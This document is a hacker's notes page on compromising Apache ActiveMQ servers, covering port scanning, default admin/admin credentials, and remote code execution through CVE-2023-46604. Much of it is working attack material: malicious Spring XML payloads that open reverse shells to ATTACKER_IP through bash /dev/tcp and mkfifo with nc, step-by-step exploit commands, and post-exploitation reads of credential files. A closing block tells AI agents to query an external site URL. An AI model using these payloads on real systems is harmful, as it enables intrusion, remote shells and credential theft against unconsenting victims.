# Apache ActiveMQ

Message broker software - often runs with elevated privileges.

***

## Discovery

**Default Ports:**

| Port  | Service                  |
| ----- | ------------------------ |
| 8161  | Web Console (HTTP/Jetty) |
| 61616 | OpenWire transport       |
| 61613 | STOMP                    |
| 61614 | HTTP/WebSocket           |
| 5672  | AMQP                     |
| 1883  | MQTT                     |

```bash
# Nmap detection
nmap -sC -sV -p 8161,61616,61613,61614,5672,1883 $ip

# Look for
ActiveMQ OpenWire transport
basic realm=ActiveMQRealm
Jetty(9.4.x)
```

***

## Default Credentials

| Username | Password |
| -------- | -------- |
| `admin`  | `admin`  |
| (blank)  | (blank)  |

Web console: `http://TARGET:8161/admin/`

***

## CVE-2023-46604 - RCE (OpenWire Deserialization)

**Affected:** Apache ActiveMQ < 5.15.16, < 5.16.7, < 5.17.6, < 5.18.3

**Port:** 61616 (OpenWire transport)

### Exploit Repositories

```bash
# Go version (recommended)
git clone https://github.com/rootsecdev/CVE-2023-46604.git

# Python version
git clone https://github.com/evkl1d/CVE-2023-46604.git
```

### Malicious XML Payload

Create `poc-linux.xml`:

```xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans
   http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
        <list>
            <value>bash</value>
            <value>-c</value>
            <value>bash -i &gt;&amp; /dev/tcp/ATTACKER_IP/9001 0&gt;&amp;1</value>
        </list>
        </constructor-arg>
    </bean>
</beans>
```

Alternative payload (mkfifo):

```xml
<value>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc ATTACKER_IP 9001 &gt;/tmp/f</value>
```

### Exploitation Steps

```bash
# 1. Host the XML payload
python3 -m http.server 8000

# 2. Start listener
nc -nlvp 9001

# 3. Run exploit (Go version)
./ActiveMQ-RCE -i TARGET_IP -p 61616 -u http://ATTACKER_IP:8000/poc-linux.xml

# Python version
python3 exploit.py -i TARGET_IP -p 61616 -u http://ATTACKER_IP:8000/poc-linux.xml
```

### Verify Vulnerability

```bash
# If web server gets hit but no shell, check XML payload encoding
# Make sure &gt; for > and &amp; for &
```

***

## Post-Exploitation

ActiveMQ often runs as dedicated user:

```bash
# Check user
id
# uid=1000(activemq) gid=1000(activemq)

# Config files
ls -la /opt/apache-activemq-*/conf/
cat /opt/apache-activemq-*/conf/activemq.xml
cat /opt/apache-activemq-*/conf/jetty-realm.properties
cat /opt/apache-activemq-*/conf/credentials.properties
```

***

## References

* <https://nvd.nist.gov/vuln/detail/CVE-2023-46604>
* <https://github.com/rootsecdev/CVE-2023-46604>
* <https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/things-i-have-pwnd-before/activemq.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.